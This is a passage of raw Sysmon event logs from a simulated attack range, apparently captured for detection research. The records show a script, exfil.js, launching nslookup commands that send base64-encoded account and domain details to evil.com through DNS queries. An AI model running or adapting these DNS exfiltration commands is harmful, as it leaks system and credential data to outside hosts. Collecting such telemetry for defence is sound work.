14:16:15.672{2E1864BB-17A1-629A-783D-000000005F02}55525624C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-B43E-000000005F02}6716C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196373Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.682{2E1864BB-17AF-629A-B43E-000000005F02}6716C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleuq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196372Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.672{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljiqy.tmpMD5=F2DEA30CCAFC980D2EE697947950EBBC,SHA256=F1E23F5C438D3FDCE7F81A746C6D3B73A4C9E6300EF433F28E2B4040CD435CFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196371Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.657{2E1864BB-17AF-629A-B23E-000000005F02}65164052C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B33E-000000005F02}7576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196370Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196369Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196368Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196367Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196366Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B33E-000000005F02}7576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196365Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.641{2E1864BB-17AF-629A-B13E-000000005F02}77603636C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-B33E-000000005F02}7576C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196364Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.655{2E1864BB-17AF-629A-B33E-000000005F02}7576C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-B13E-000000005F02}7760C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljiqy.tmp 2>&1 10341000x8000000000000000196363Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.625{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B23E-000000005F02}6516C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196362Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.625{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AF-629A-B23E-000000005F02}6516C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196361Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.625{2E1864BB-17AF-629A-B23E-000000005F02}65164052C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B13E-000000005F02}7760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196360Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B23E-000000005F02}6516C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196359Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196358Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196357Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196356Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196355Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B13E-000000005F02}7760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196354Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-17A1-629A-783D-000000005F02}55524864C:\Windows\System32\WScript.exe{2E1864BB-17AF-629A-B13E-000000005F02}7760C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196353Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.608{2E1864BB-17AF-629A-B13E-000000005F02}7760C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljiqy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196352Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.603{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqpge.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196351Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-17AF-629A-AF3E-000000005F02}70447312C:\Windows\system32\conhost.exe{2E1864BB-17AF-629A-B03E-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196350Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17AF-629A-B03E-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196349Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196348Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196347Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196346Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196345Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-17AF-629A-AE3E-000000005F02}42887020C:\Windows\system32\cmd.exe{2E1864BB-17AF-629A-B03E-000000005F02}8012C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196344Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.576{2E1864BB-17AF-629A-B03E-000000005F02}8012C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AF-629A-AE3E-000000005F02}4288C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvqpge.tmp 2>&1 23542300x8000000000000000196343Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:15.572{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla 